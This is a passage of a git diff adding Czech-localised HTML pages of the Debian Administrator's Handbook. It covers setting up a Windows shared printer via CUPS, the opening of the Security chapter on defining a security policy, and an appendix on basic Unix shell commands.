+					CUPS is an elegant solution for printing from a Linux workstation to a printer shared by a Windows machine. When the <span
+                class="pkg pkg">smbclient</span> is installed, CUPS allows installing Windows shared printers automatically.
+				</div><a
+              id="id-1.14.8.10.7.3"
+              class="indexterm"></a><div
+              class="para">
+					Here are the required steps:
+				</div><div
+              xmlns:d="http://docbook.org/ns/docbook"
+              class="itemizedlist"><ul><li
+                  class="listitem"><div
+                    class="para">
+							Enter the CUPS configuration interface: <code
+                      class="literal">http://localhost:631/admin</code>
+						</div></li><li
+                  class="listitem"><div
+                    class="para">
+							Click on “Add Printer”.
+						</div></li><li
+                  class="listitem"><div
+                    class="para">
+							Choose the printer device, pick “Windows Printer via SAMBA”.
+						</div></li><li
+                  class="listitem"><div
+                    class="para">
+							Enter the connection URI for the network printer. It should look like the following:
+						</div><div
+                    class="para">
+							<code
+                      class="literal">smb://<em
+                        class="replaceable">user</em>:<em
+                        class="replaceable">password</em>@<em
+                        class="replaceable">server</em>/<em
+                        class="replaceable">printer</em></code>.
+						</div></li><li
+                  class="listitem"><div
+                    class="para">
+							Enter the name that will uniquely identify this printer. Then enter the description and location of the printer. Those are the strings that will be shown to end users to help them identify the printers.
+						</div></li><li
+                  class="listitem"><div
+                    class="para">
+							Indicate the manufacturer/model of the printer, or directly provide a working printer description file (PPD).
+						</div></li></ul></div><div
+              class="para">
+					Voilà, the printer is operational!
+				</div></div></div></div><ul
+        class="docnav"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.nfs-file-server.html"><strong>Předcházející</strong>11.4. NFS File Server</a></li><li
+          class="up"><a
+            accesskey="u"
+            href="#"><strong>Nahoru</strong></a></li><li
+          class="home"><a
+            accesskey="h"
+            href="index.html"><strong>Domů</strong></a></li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.http-ftp-proxy.html"><strong>Další</strong>11.6. HTTP/FTP Proxy</a></li></ul></body></html>
diff --git a/tmp/cs-CZ/html/security.html b/tmp/cs-CZ/html/security.html
new file mode 100644
index 000000000..8e46a8745
--- /dev/null
+++ b/tmp/cs-CZ/html/security.html
@@ -0,0 +1,230 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html
+    xmlns="http://www.w3.org/1999/xhtml"><head><meta
+        http-equiv="Content-Type"
+        content="text/html; charset=UTF-8" /><title
+        xmlns:d="http://docbook.org/ns/docbook">Kapitola 14. Security</title><link
+        rel="stylesheet"
+        type="text/css"
+        href="Common_Content/css/default.css" /><link
+        rel="stylesheet"
+        media="print"
+        href="Common_Content/css/print.css"
+        type="text/css" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="generator"
+        content="publican v4.3.2" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="package"
+        content="Debian-debian-handbook-9-cs-CZ-1.0-1" /><meta
+        name="keywords"
+        content="Firewall, Netfilter, IDS/NIDS" /><link
+        rel="home"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="up"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="prev"
+        href="sect.rtc-clients.html"
+        title="13.10. Real-Time Communications software" /><link
+        rel="next"
+        href="sect.firewall-packet-filtering.html"
+        title="14.2. Firewall or Packet Filtering" /><meta
+        xmlns=""
+        name="flattr:id"
+        content="4pz9jq" /><link
+        xmlns=""
+        rel="canonical"
+        href="https://debian-handbook.info/browse/cs-CZ/stable/security.html" /></head><body><div
+        id="banner"><a
+          href="http://debian-handbook.info/get/"><span
+            class="text">Download the ebook</span></a></div><p
+        id="title"><a
+          class="left"
+          href="http://www.debian.org"><img
+            alt="Product Site"
+            src="Common_Content/images//image_left.png" /></a><a
+          class="right"
+          href="index.html"><img
+            alt="Documentation Site"
+            src="Common_Content/images//image_right.png" /></a></p><ul
+        class="docnav top"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.rtc-clients.html"><strong>Předcházející</strong></a></li><li
+          class="home">The Debian Administrator's Handbook</li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.firewall-packet-filtering.html"><strong>Další</strong></a></li></ul><div
+        xml:lang="cs-CZ"
+        class="chapter"
+        lang="cs-CZ"><div
+          class="titlepage"><div><div><h1
+                class="title"><a
+                  xmlns=""
+                  id="security"></a>Kapitola 14. Security</h1></div></div></div><div
+          class="toc"><dl
+            class="toc"><dt><span
+                class="section"><a
+                  href="security.html#sect.defining-security-policy">14.1. Defining a Security Policy</a></span></dt><dt><span
+                class="section"><a
+                  href="sect.firewall-packet-filtering.html">14.2. Firewall or Packet Filtering</a></span></dt><dd><dl><dt><span
+                    class="section"><a
+                      href="sect.firewall-packet-filtering.html#sect.netfilter">14.2.1. Netfilter Behavior</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.firewall-packet-filtering.html#sect.iptables">14.2.2. Syntax of <code
+                        class="command">iptables</code> and <code
+                        class="command">ip6tables</code></a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.firewall-packet-filtering.html#sect.creating-rules">14.2.3. Creating Rules</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.firewall-packet-filtering.html#sect.install-rules-at-boot">14.2.4. Installing the Rules at Each Boot</a></span></dt></dl></dd><dt><span
+                class="section"><a
+                  href="sect.supervision.html">14.3. Supervision: Prevention, Detection, Deterrence</a></span></dt><dd><dl><dt><span
+                    class="section"><a
+                      href="sect.supervision.html#sect.logcheck">14.3.1. Monitoring Logs with <code
+                        class="command">logcheck</code></a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.supervision.html#sect.monitoring-activity">14.3.2. Monitoring Activity</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.supervision.html#id-1.17.6.6">14.3.3. Detecting Changes</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.supervision.html#sect.intrusion-detection">14.3.4. Detecting Intrusion (IDS/NIDS)</a></span></dt></dl></dd><dt><span
+                class="section"><a
+                  href="sect.apparmor.html">14.4. Introduction to AppArmor</a></span></dt><dd><dl><dt><span
+                    class="section"><a
+                      href="sect.apparmor.html#sect.apparmor-principles">14.4.1. Principles</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.apparmor.html#sect.apparmor-setup">14.4.2. Enabling AppArmor and managing AppArmor profiles</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.apparmor.html#sect.apparmor-new-profile">14.4.3. Creating a new profile</a></span></dt></dl></dd><dt><span
+                class="section"><a
+                  href="sect.selinux.html">14.5. Introduction to SELinux</a></span></dt><dd><dl><dt><span
+                    class="section"><a
+                      href="sect.selinux.html#sect.selinux-principles">14.5.1. Principles</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.selinux.html#sect.selinux-setup">14.5.2. Setting Up SELinux</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.selinux.html#sect.selinux-management">14.5.3. Managing an SELinux System</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.selinux.html#sect.selinux-custom-rules">14.5.4. Adapting the Rules</a></span></dt></dl></dd><dt><span
+                class="section"><a
+                  href="sect.other-security-considerations.html">14.6. Other Security-Related Considerations</a></span></dt><dd><dl><dt><span
+                    class="section"><a
+                      href="sect.other-security-considerations.html#id-1.17.9.3">14.6.1. Inherent Risks of Web Applications</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.other-security-considerations.html#id-1.17.9.4">14.6.2. Knowing What To Expect</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.other-security-considerations.html#sect.choosing-the-software-wisely">14.6.3. Choosing the Software Wisely</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.other-security-considerations.html#sect.managing-a-machine-as-a-whole">14.6.4. Managing a Machine as a Whole</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.other-security-considerations.html#sect.users-are-players">14.6.5. Users Are Players</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.other-security-considerations.html#sect.physical-security">14.6.6. Physical Security</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.other-security-considerations.html#id-1.17.9.9">14.6.7. Legal Liability</a></span></dt></dl></dd><dt><span
+                class="section"><a
+                  href="sect.dealing-with-compromised-machine.html">14.7. Dealing with a Compromised Machine</a></span></dt><dd><dl><dt><span
+                    class="section"><a
+                      href="sect.dealing-with-compromised-machine.html#id-1.17.10.3">14.7.1. Detecting and Seeing the Cracker's Intrusion</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.dealing-with-compromised-machine.html#id-1.17.10.4">14.7.2. Putting the Server Off-Line</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.dealing-with-compromised-machine.html#sect.keeping-everything-that-could-be-used-as-evidence">14.7.3. Keeping Everything that Could Be Used as Evidence</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.dealing-with-compromised-machine.html#id-1.17.10.6">14.7.4. Re-installing</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.dealing-with-compromised-machine.html#sect.forensic-analysis">14.7.5. Forensic Analysis</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.dealing-with-compromised-machine.html#sect.reconstituting-the-attack-scenario">14.7.6. Reconstituting the Attack Scenario</a></span></dt></dl></dd></dl></div><div
+          class="highlights"><div
+            class="para">
+		An information system can have a varying level of importance depending on the environment. In some cases, it is vital to a company's survival. It must therefore be protected from various kinds of risks. The process of evaluating these risks, defining and implementing the protection is collectively known as the “security process”.
+	</div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h2
+                  class="title"><a
+                    xmlns=""
+                    id="sect.defining-security-policy"></a>14.1. Defining a Security Policy</h2></div></div></div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>CAUTION</em></span> Scope of this chapter</strong></p></div></div></div><div
+              class="para">
+			Security is a vast and very sensitive subject, so we cannot claim to describe it in any kind of comprehensive manner in the course of a single chapter. We will only delineate a few important points and describe some of the tools and methods that can be of use in the security domain. For further reading, literature abounds, and entire books have been devoted to the subject. An excellent starting point would be <em
+                class="citetitle">Linux Server Security</em> by Michael D. Bauer (published by O'Reilly).
+		</div></div><div
+            class="para">
+			The word “security” itself covers a vast range of concepts, tools and procedures, none of which apply universally. Choosing among them requires a precise idea of what your goals are. Securing a system starts with answering a few questions. Rushing headlong into implementing an arbitrary set of tools runs the risk of focusing on the wrong aspects of security.
+		</div><div
+            class="para">
+			The very first thing to determine is therefore the goal. A good approach to help with that determination starts with the following questions:
+		</div><div
+            xmlns:d="http://docbook.org/ns/docbook"
+            class="itemizedlist"><ul><li
+                class="listitem"><div
+                  class="para">
+					<span
+                    class="emphasis"><em>What</em></span> are we trying to protect? The security policy will be different depending on whether we want to protect computers or data. In the latter case, we also need to know which data.
+				</div></li><li
+                class="listitem"><div
+                  class="para">
+					What are we trying to protect <span
+                    class="emphasis"><em>against</em></span>? Is it leakage of confidential data? Accidental data loss? Revenue loss caused by disruption of service?
+				</div></li><li
+                class="listitem"><div
+                  class="para">
+					Also, <span
+                    class="emphasis"><em>who</em></span> are we trying to protect against? Security measures will be quite different for guarding against a typo by a regular user of the system than they would be when protecting against a determined attacker group.
+				</div></li></ul></div><div
+            class="para">
+			The term “risk” is customarily used to refer collectively to these three factors: what to protect, what needs to be prevented from happening, and who will try to make it happen. Modeling the risk requires answers to these three questions. From this risk model, a security policy can be constructed, and the policy can be implemented with concrete actions.
+		</div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>NOTE</em></span> Permanent questioning</strong></p></div></div></div><div
+              class="para">
+			Bruce Schneier, a world expert in security matters (not only computer security) tries to counter one of security's most important myths with a motto: “Security is a process, not a product”. Assets to be protected change in time, and so do threats and the means available to potential attackers. Even if a security policy has initially been perfectly designed and implemented, one should never rest on one's laurels. The risk components evolve, and the response to that risk must evolve accordingly.
+		</div></div><div
+            class="para">
+			Extra constraints are also worth taking into account, as they can restrict the range of available policies. How far are we willing to go to secure a system? This question has a major impact on the policy to implement. The answer is too often only defined in terms of monetary costs, but the other elements should also be considered, such as the amount of inconvenience imposed on system users or performance degradation.
+		</div><div
+            class="para">
+			Once the risk has been modeled, one can start thinking about designing an actual security policy.
+		</div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>NOTE</em></span> Extreme policies</strong></p></div></div></div><div
+              class="para">
+			There are cases where the choice of actions required to secure a system is extremely simple.
+		</div><div
+              class="para">
+			For instance, if the system to be protected only comprises a second-hand computer, the sole use of which is to add a few numbers at the end of the day, deciding not to do anything special to protect it would be quite reasonable. The intrinsic value of the system is low. The value of the data is zero since they are not stored on the computer. A potential attacker infiltrating this “system” would only gain an unwieldy calculator. The cost of securing such a system would probably be greater than the cost of a breach.
+		</div><div
+              class="para">
+			At the other end of the spectrum, we might want to protect the confidentiality of secret data in the most comprehensive way possible, trumping any other consideration. In this case, an appropriate response would be the total destruction of these data (securely erasing the files, shredding of the hard disks to bits, then dissolving these bits in acid, and so on). If there is an additional requirement that data must be kept in store for future use (although not necessarily readily available), and if cost still isn't a factor, then a starting point would be storing the data on iridium–platinum alloy plates stored in bomb-proof bunkers under various mountains in the world, each of which being (of course) both entirely secret and guarded by entire armies…
+		</div><div
+              class="para">
+			Extreme though these examples may seem, they would nevertheless be an adequate response to defined risks, insofar as they are the outcome of a thought process that takes into account the goals to reach and the constraints to fulfill. When coming from a reasoned decision, no security policy is less respectable than any other.
+		</div></div><div
+            class="para">
+			In most cases, the information system can be segmented in consistent and mostly independent subsets. Each subsystem will have its own requirements and constraints, and so the risk assessment and the design of the security policy should be undertaken separately for each. A good principle to keep in mind is that a short and well-defined perimeter is easier to defend than a long and winding frontier. The network organization should also be designed accordingly: the sensitive services should be concentrated on a small number of machines, and these machines should only be accessible via a minimal number of check-points; securing these check-points will be easier than securing all the sensitive machines against the entirety of the outside world. It is at this point that the usefulness of network filtering (including by firewalls) becomes apparent. This filtering can be implemented with dedicated hardware, but a possibly simpler and more flexible solution is to use a software firewall such as the one integrated in the Linux kernel.
+		</div></div></div><ul
+        class="docnav"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.rtc-clients.html"><strong>Předcházející</strong>13.10. Real-Time Communications software</a></li><li
+          class="up"><a
+            accesskey="u"
+            href="#"><strong>Nahoru</strong></a></li><li
+          class="home"><a
+            accesskey="h"
+            href="index.html"><strong>Domů</strong></a></li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.firewall-packet-filtering.html"><strong>Další</strong>14.2. Firewall or Packet Filtering</a></li></ul></body></html>
diff --git a/tmp/cs-CZ/html/short-remedial-course.html b/tmp/cs-CZ/html/short-remedial-course.html
new file mode 100644
index 000000000..e1f1b8b5a
--- /dev/null
+++ b/tmp/cs-CZ/html/short-remedial-course.html
@@ -0,0 +1,323 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html
+    xmlns="http://www.w3.org/1999/xhtml"><head><meta
+        http-equiv="Content-Type"
+        content="text/html; charset=UTF-8" /><title
+        xmlns:d="http://docbook.org/ns/docbook">Příloha B. Short Remedial Course</title><link
+        rel="stylesheet"
+        type="text/css"
+        href="Common_Content/css/default.css" /><link
+        rel="stylesheet"
+        media="print"
+        href="Common_Content/css/print.css"
+        type="text/css" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="generator"
+        content="publican v4.3.2" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="package"
+        content="Debian-debian-handbook-9-cs-CZ-1.0-1" /><meta
+        name="keywords"
+        content="BIOS, Kernel, Unix, Process, Hierarchy, Basic Commands" /><link
+        rel="home"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="up"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="prev"
+        href="sect.other-derivatives.html"
+        title="A.13. And Many More" /><link
+        rel="next"
+        href="sect.filesystem-hierarchy.html"
+        title="B.2. Organization of the Filesystem Hierarchy" /><meta
+        xmlns=""
+        name="flattr:id"
+        content="4pz9jq" /><link
+        xmlns=""
+        rel="canonical"
+        href="https://debian-handbook.info/browse/cs-CZ/stable/short-remedial-course.html" /></head><body><div
+        id="banner"><a
+          href="http://debian-handbook.info/get/"><span
+            class="text">Download the ebook</span></a></div><p
+        id="title"><a
+          class="left"
+          href="http://www.debian.org"><img
+            alt="Product Site"
+            src="Common_Content/images//image_left.png" /></a><a
+          class="right"
+          href="index.html"><img
+            alt="Documentation Site"
+            src="Common_Content/images//image_right.png" /></a></p><ul
+        class="docnav top"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.other-derivatives.html"><strong>Předcházející</strong></a></li><li
+          class="home">The Debian Administrator's Handbook</li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.filesystem-hierarchy.html"><strong>Další</strong></a></li></ul><div
+        xml:lang="cs-CZ"
+        class="appendix"
+        lang="cs-CZ"><div
+          class="titlepage"><div><div><h1
+                class="title"><a
+                  xmlns=""
+                  id="short-remedial-course"></a>Příloha B. Short Remedial Course</h1></div></div></div><div
+          class="highlights"><div
+            class="para">
+		Even though this book primarily targets administrators and “power-users”, we wouldn't like to exclude motivated beginners. This appendix will therefore be a crash-course describing the fundamental concepts involved in handling a Unix computer.
+	</div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h2
+                  class="title"><a
+                    xmlns=""
+                    id="sect.shell-and-basic-commands"></a>B.1. Shell and Basic Commands</h2></div></div></div><div
+            class="para">
+			In the Unix world, every administrator has to use the command line sooner or later; for example, when the system fails to start properly and only provides a command-line rescue mode. Being able to handle such an interface, therefore, is a basic survival skill for these circumstances.
+		</div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>QUICK LOOK</em></span> Starting the command interpreter</strong></p></div></div></div><div
+              class="para">
+			A command-line environment can be run from the graphical desktop, by an application known as a “terminal”. In GNOME, you can start it from the “Activities” overview (that you get when you move the mouse in the top-left corner of the screen) by typing the first letters of the application name. In Plasma, you will find it in the <span
+                class="guimenu"><strong>K</strong></span> → <span
+                class="guisubmenu"><strong>Applications</strong></span> → <span
+                class="guisubmenu"><strong>System</strong></span> menu.
+		</div></div><div
+            class="para">
+			This section only gives a quick peek at the commands. They all have many options not described here, so please refer to the abundant documentation in their respective manual pages.
+		</div><div
+            class="section"><div
+              class="titlepage"><div><div><h3
+                    class="title"><a
+                      xmlns=""
+                      id="id-1.21.4.5"></a>B.1.1. Browsing the Directory Tree and Managing Files</h3></div></div></div><div
+              class="para">
+				Once a session is open, the <code
+                class="command">pwd</code> command (which stands for <span
+                class="emphasis"><em>print working directory</em></span>) displays the current location in the filesystem. The current directory is changed with the <code
+                class="command">cd <em
+                  class="replaceable">directory</em></code> command (<code
+                class="command">cd</code> is for <span
+                class="emphasis"><em>change directory</em></span>). The parent directory is always called <code
+                class="literal">..</code> (two dots), whereas the current directory is also known as <code
+                class="literal">.</code> (one dot). The <code
+                class="command">ls</code> command allows <span
+                class="emphasis"><em>listing</em></span> the contents of a directory. If no parameters are given, it operates on the current directory.
+			</div><pre
+              class="screen">
+<code
+                class="computeroutput">$ </code><strong
+                class="userinput"><code>pwd</code></strong>
+<code
+                class="computeroutput">/home/rhertzog
+$ </code><strong
+                class="userinput"><code>cd Desktop</code></strong>
+<code
+                class="computeroutput">$ </code><strong
+                class="userinput"><code>pwd</code></strong>
+<code
+                class="computeroutput">/home/rhertzog/Desktop
+$ </code><strong
+                class="userinput"><code>cd .</code></strong>
+<code
+                class="computeroutput">$ </code><strong
+                class="userinput"><code>pwd</code></strong>
+<code
+                class="computeroutput">/home/rhertzog/Desktop
+$ </code><strong
+                class="userinput"><code>cd ..</code></strong>
+<code
+                class="computeroutput">$ </code><strong
+                class="userinput"><code>pwd</code></strong>
+<code
+                class="computeroutput">/home/rhertzog
+$ </code><strong
+                class="userinput"><code>ls</code></strong>
+<code
+                class="computeroutput">Desktop    Downloads  Pictures  Templates
+Documents  Music      Public    Videos</code>
+</pre><div
+              class="para">
+				A new directory can be created with <code
+                class="command">mkdir <em
+                  class="replaceable">directory</em></code>, and an existing (empty) directory can be removed with <code
+                class="command">rmdir <em
+                  class="replaceable">directory</em></code>. The <code
+                class="command">mv</code> command allows <span
+                class="emphasis"><em>moving</em></span> and/or renaming files and directories; <span
+                class="emphasis"><em>removing</em></span> a file is achieved with <code
+                class="command">rm <em
+                  class="replaceable">file</em></code>.
+			</div><pre
+              class="screen">
+<code
+                class="computeroutput">$ </code><strong
+                class="userinput"><code>mkdir test</code></strong>
+<code
+                class="computeroutput">$ </code><strong
+                class="userinput"><code>ls</code></strong>
+<code
+                class="computeroutput">Desktop    Downloads  Pictures  Templates  Videos
+Documents  Music      Public    test
+$ </code><strong
+                class="userinput"><code>mv test new</code></strong>
+<code
+                class="computeroutput">$ </code><strong
+                class="userinput"><code>ls</code></strong>
+<code
+                class="computeroutput">Desktop    Downloads  new       Public     Videos
+Documents  Music      Pictures  Templates
+$ </code><strong
+                class="userinput"><code>rmdir new</code></strong>
+<code
+                class="computeroutput">$ </code><strong
+                class="userinput"><code>ls</code></strong>
+<code
+                class="computeroutput">Desktop    Downloads  Pictures  Templates  Videos
+Documents  Music      Public</code>
+</pre></div><div
+            class="section"><div
+              class="titlepage"><div><div><h3
+                    class="title"><a
+                      xmlns=""
+                      id="id-1.21.4.6"></a>B.1.2. Displaying and Modifying Text Files</h3></div></div></div><div
+              class="para">
+				The <code
+                class="command">cat <em
+                  class="replaceable">file</em></code> command (intended to <span
+                class="emphasis"><em>concatenate</em></span> files to the standard output device) reads a file and displays its contents on the terminal. If the file is too big to fit on a screen, use a pager such as <code
+                class="command">less</code> (or <code
+                class="command">more</code>) to display it page by page.
+			</div><div
+              class="para">
+				The <code
+                class="command">editor</code> command starts a text editor (such as <code
+                class="command">vi</code> or <code
+                class="command">nano</code>) and allows creating, modifying and reading text files. The simplest files can sometimes be created directly from the command interpreter thanks to redirection: <code
+                class="command">echo "<em
+                  class="replaceable">text</em>" &gt;<em
+                  class="replaceable">file</em></code> creates a file named <em
+                class="replaceable">file</em> with “<em
+                class="replaceable">text</em>” as its contents. Adding a line at the end of this file is possible too, with a command such as <code
+                class="command">echo "<em
+                  class="replaceable">moretext</em>" &gt;&gt;<em
+                  class="replaceable">file</em></code>. Note the <code
+                class="literal">&gt;&gt;</code> in this example.
+			</div></div><div
+            class="section"><div
+              class="titlepage"><div><div><h3
+                    class="title"><a
+                      xmlns=""
+                      id="id-1.21.4.7"></a>B.1.3. Searching for Files and within Files</h3></div></div></div><div
+              class="para">
+				The <code
+                class="command">find <em
+                  class="replaceable">directory</em> <em
+                  class="replaceable">criteria</em></code> command looks for files in the hierarchy under <em
+                class="replaceable">directory</em> according to several criteria. The most commonly used criterion is <code
+                class="literal">-name <em
+                  class="replaceable">name</em></code>: that allows looking for a file by its name.
+			</div><div
+              class="para">
+				The <code
+                class="command">grep <em
+                  class="replaceable">expression</em> <em
+                  class="replaceable">files</em></code> command searches the contents of the files and extracts the lines matching the regular expression (see sidebar <a
+                class="xref"
+                href="network-services.html#sidebar.regexp"><span
+                  class="emphasis"><em>BACK TO BASICS</em></span> Regular expression</a>). Adding the <code
+                class="literal">-r</code> option enables a recursive search on all files contained in the directory passed as a parameter. This allows looking for a file when only a part of the contents are known.
+			</div></div><div
+            class="section"><div
+              class="titlepage"><div><div><h3
+                    class="title"><a
+                      xmlns=""
+                      id="id-1.21.4.8"></a>B.1.4. Managing Processes</h3></div></div></div><div
+              class="para">
+				The <code
+                class="command">ps aux</code> command lists the processes currently running and helps identifying them by showing their <span
+                class="emphasis"><em>pid</em></span> (process id). Once the <span
+                class="emphasis"><em>pid</em></span> of a process is known, the <code
+                class="command">kill -<em
+                  class="replaceable">signal</em> <em
+                  class="replaceable">pid</em></code> command allows sending it a signal (if the process belongs to the current user). Several signals exist; most commonly used are <code
+                class="literal">TERM</code> (a request to terminate gracefully) and <code
+                class="literal">KILL</code> (a forced kill).
+			</div><div
+              class="para">
+				The command interpreter can also run programs in the background if the command is followed by a “&amp;”. By using the ampersand, the user resumes control of the shell immediately even though the command is still running (hidden from the user; as a background process). The <code
+                class="command">jobs</code> command lists the processes running in the background; running <code
+                class="command">fg %<em
+                  class="replaceable">job-number</em></code> (for <span
+                class="emphasis"><em>foreground</em></span>) restores a job to the foreground. When a command is running in the foreground (either because it was started normally, or brought back to the foreground with <code
+                class="command">fg</code>), the <span
+                class="keycap"><strong>Control</strong></span>+<span
+                class="keycap"><strong>Z</strong></span> key combination pauses the process and resumes control of the command-line. The process can then be restarted in the background with <code
+                class="command">bg %<em
+                  class="replaceable">job-number</em></code> (for <span
+                class="foreignphrase"><em
+                  class="foreignphrase">background</em></span>).
+			</div></div><div
+            class="section"><div
+              class="titlepage"><div><div><h3
+                    class="title"><a
+                      xmlns=""
+                      id="id-1.21.4.9"></a>B.1.5. System Information: Memory, Disk Space, Identity</h3></div></div></div><div
+              class="para">
+				The <code
+                class="command">free</code> command displays information on memory; <code
+                class="command">df</code> (<span
+                class="emphasis"><em>disk free</em></span>) reports on the available disk space on each of the disks mounted in the filesystem. Its <code
+                class="literal">-h</code> option (for <span
+                class="emphasis"><em>human readable</em></span>) converts the sizes into a more legible unit (usually mebibytes or gibibytes). In a similar fashion, the <code
+                class="command">free</code> command supports the <code
+                class="literal">-m</code> and <code
+                class="literal">-g</code> options, and displays its data either in mebibytes or in gibibytes, respectively.
+			</div><pre
+              class="screen">
+<code
+                class="computeroutput">$ </code><strong
+                class="userinput"><code>free</code></strong>
+<code
+                class="computeroutput">             total       used       free     shared    buffers     cached
+Mem:       1028420    1009624      18796          0      47404     391804
+-/+ buffers/cache:     570416     458004
+Swap:      2771172     404588    2366584
+$ </code><strong
+                class="userinput"><code>df</code></strong>
+<code
+                class="computeroutput">Filesystem           1K-blocks      Used Available Use% Mounted on
+/dev/sda2              9614084   4737916   4387796  52% /
+tmpfs                   514208         0    514208   0% /lib/init/rw
+udev                     10240       100     10140   1% /dev
+tmpfs                   514208    269136    245072  53% /dev/shm
+/dev/sda5             44552904  36315896   7784380  83% /home
+</code></pre><div
+              class="para">
+				The <code
+                class="command">id</code> command displays the identity of the user running the session, along with the list of groups they belong to. Since access to some files or devices may be limited to group members, checking available group membership may be useful.
+			</div><pre
+              class="screen">
+<code
+                class="computeroutput">$ </code><strong
+                class="userinput"><code>id</code></strong>
+<code
+                class="computeroutput">uid=1000(rhertzog) gid=1000(rhertzog) groups=1000(rhertzog),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),108(netdev),109(bluetooth),115(scanner)</code>
+</pre></div></div></div><ul
+        class="docnav"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.other-derivatives.html"><strong>Předcházející</strong>A.13. And Many More</a></li><li
+          class="up"><a
+            accesskey="u"
+            href="#"><strong>Nahoru</strong></a></li><li
+          class="home"><a
+            accesskey="h"
+            href="index.html"><strong>Domů</strong></a></li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.filesystem-hierarchy.html"><strong>Další</strong>B.2. Organization of the Filesystem Hierarchy</a></li></ul></body></html>
diff --git a/tmp/cs-CZ/html/solving-problems.html b/tmp/cs-CZ/html/solving-problems.html
new file mode 100644
index 000000000..25bb23be4
--- /dev/null
+++ b/tmp/cs-CZ/html/solving-problems.html
@@ -0,0 +1,474 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html
+    xmlns="http://www.w3.org/1999/xhtml"><head><meta
+        http-equiv="Content-Type"
+        content="text/html; charset=UTF-8" /><title
+        xmlns:d="http://docbook.org/ns/docbook">Kapitola 7. Solving Problems and Finding Relevant Information</title><link
+        rel="stylesheet"
+        type="text/css"
+        href="Common_Content/css/default.css" /><link
+        rel="stylesheet"
+        media="print"
+        href="Common_Content/css/print.css"
+        type="text/css" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="generator"
+        content="publican v4.3.2" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="package"
+        content="Debian-debian-handbook-9-cs-CZ-1.0-1" /><meta
+        name="keywords"
+        content="Documentation, Solving problems, Log files, README.Debian, Manual, info" /><link
+        rel="home"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="up"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="prev"
+        href="sect.searching-packages.html"
+        title="6.9. Searching for Packages" /><link
+        rel="next"
+        href="sect.common-procedures.html"
+        title="7.2. Common Procedures" /><meta
+        xmlns=""
+        name="flattr:id"
+        content="4pz9jq" /><link
+        xmlns=""
+        rel="canonical"
+        href="https://debian-handbook.info/browse/cs-CZ/stable/solving-problems.html" /></head><body><div
+        id="banner"><a
+          href="http://debian-handbook.info/get/"><span
+            class="text">Download the ebook</span></a></div><p
+        id="title"><a
+          class="left"
+          href="http://www.debian.org"><img
+            alt="Product Site"
+            src="Common_Content/images//image_left.png" /></a><a
+          class="right"
+          href="index.html"><img
+            alt="Documentation Site"
+            src="Common_Content/images//image_right.png" /></a></p><ul
+        class="docnav top"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.searching-packages.html"><strong>Předcházející</strong></a></li><li
+          class="home">The Debian Administrator's Handbook</li><li
+          class="next"><a
+            accesskey="n"
